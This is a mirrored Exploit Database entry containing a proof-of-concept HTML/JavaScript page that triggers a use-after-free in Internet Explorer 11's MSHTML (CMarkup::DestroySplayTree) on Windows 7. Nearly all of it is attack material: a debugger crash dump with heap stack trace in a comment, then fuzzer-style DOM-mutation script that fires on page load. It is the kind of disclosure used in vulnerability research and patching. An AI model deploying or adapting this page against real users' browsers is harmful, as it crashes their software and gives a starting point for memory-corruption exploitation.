Microsoft Internet Explorer 11 – ‘CMarkup::DestroySplayTree’ Use-After-Free

• Exploit Database
• 127 阅读

• 作者： Marcin Ressel
  日期： 2017-05-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41957/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146

  <!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="Expires" content="0" /> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /> <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /> <meta http-equiv="Pragma" content="no-cache" /> <style type="text/css"> body{ background-color:black; font-color:red; }; </style>   <script type=&apos;text/javascript&apos;></script> <script type="text/javascript" language="JavaScript">   /******************************** *Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free *Google Dork: n/a *Date: 03.05.2017 *Exploit Author: Marcin Ressel *TT: @r_esselm *Vendor Homepage: www.microsoft.com *Software Link: n/a *Version: 11.0.9600.18638 *Tested on: Windows 7 *CVE : n/a ***************************** (151c.10a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0 eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010202 MSHTML!<code>CBackgroundInfo::Property<CBackgroundImage>&apos;::</code>7&apos;::<code>dynamic atexit destructor for &apos;fieldDefaultValue&apos;&apos;+0x15ae0c: 706af750 ff36pushdword ptr [esi]ds:002b:1195cfa0=???????? 0:007> !heap -p -a @esi address 1195cfa0 found in _DPH_HEAP_ROOT @ 9f61000 in free-ed allocation (DPH_HEAP_BLOCK: VirtAddr VirtSize) ef4230c: 1195c000 2000 743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2 76f9170c ntdll!RtlDebugFreeHeap+0x0000002f 76f4a863 ntdll!RtlpFreeHeap+0x0000005d 76ef2bd5 ntdll!RtlFreeHeap+0x00000142 769c14ad kernel32!HeapFree+0x00000014 707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046 6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223 7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3 702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2 702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058 700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180 700c5484 MSHTML!CFrameSite::Passivate+0x00000024 6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1 6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a 705517cb MSHTML!CBase::JSBind_Release+0x00000050 6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023 6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e 6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9 6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a 6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072 6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb 6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e 6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac 6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055 6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a 6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120 709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b 7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3 706af72d MSHTML!</code>CBackgroundInfo::Property<CBackgroundImage>&apos;::<code>7&apos;::</code>dynamic atexit destructor for &apos;fieldDefaultValue&apos;&apos;+0x0015ade9 7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6 70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8 7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93 * */   var ref = []; var doc = null; var dom = null; var trg = null; var trg_parent = null; var text_r = null; var select_o = null;   function handle() {   try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){} try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){} try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){} try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){} try{select_o.selectAllChildren(ref[1], 0);}catch(e){} try{text_r.select();}catch(e){} try{tree_r.setEnd(ref[0],0);}catch(e){} try{select_o.selectAllChildren(doc.body);}catch(e){} try{tree_r.surroundContents(ref[0]);}catch(e){} try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){} try{tree_r.selectNodeContents(document.body);}catch(e){} try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}   }     function testcase() {   vare1f = document.getElementById("e1"); doc = document.getElementById("t1").contentWindow.document; e = e1f.contentWindow.document.createElement("ins"); e.cite = &apos;about:blank&apos;; rf = doc.body.appendChild(e); ref.push(rf); e = e1f.contentWindow.document.createElement("iframe"); rf = doc.body.appendChild(e); ref.push(rf); dom = doc.getElementsByTagName("*"); trg = dom[3]; trg_parent = doc.body; text_r = doc.body.createTextRange(); tree_r = doc.createRange(); tree_r.setStart(trg,0); tree_r.setEnd(trg,0); select_o = window.getSelection();   var ob = new MutationObserver(handle); ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true }); try { trg.insertBefore(document.createElement("div"),ref[1]); } catch(e) {} doc.adoptNode(trg.attributes[0]); trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;"; tmp = trg; }   </script> <title>IE11MSHTML!CMarkup::DestroySplayTree Use-After-Free</title> </head> <body onload=&apos;testcase();&apos;> <iframe src=&apos;about:blank&apos; id=&apos;t1&apos; width="100%"></iframe><iframe width="100%" src=&apos;about:blank&apos; id=&apos;e1&apos;></iframe> </body> </html>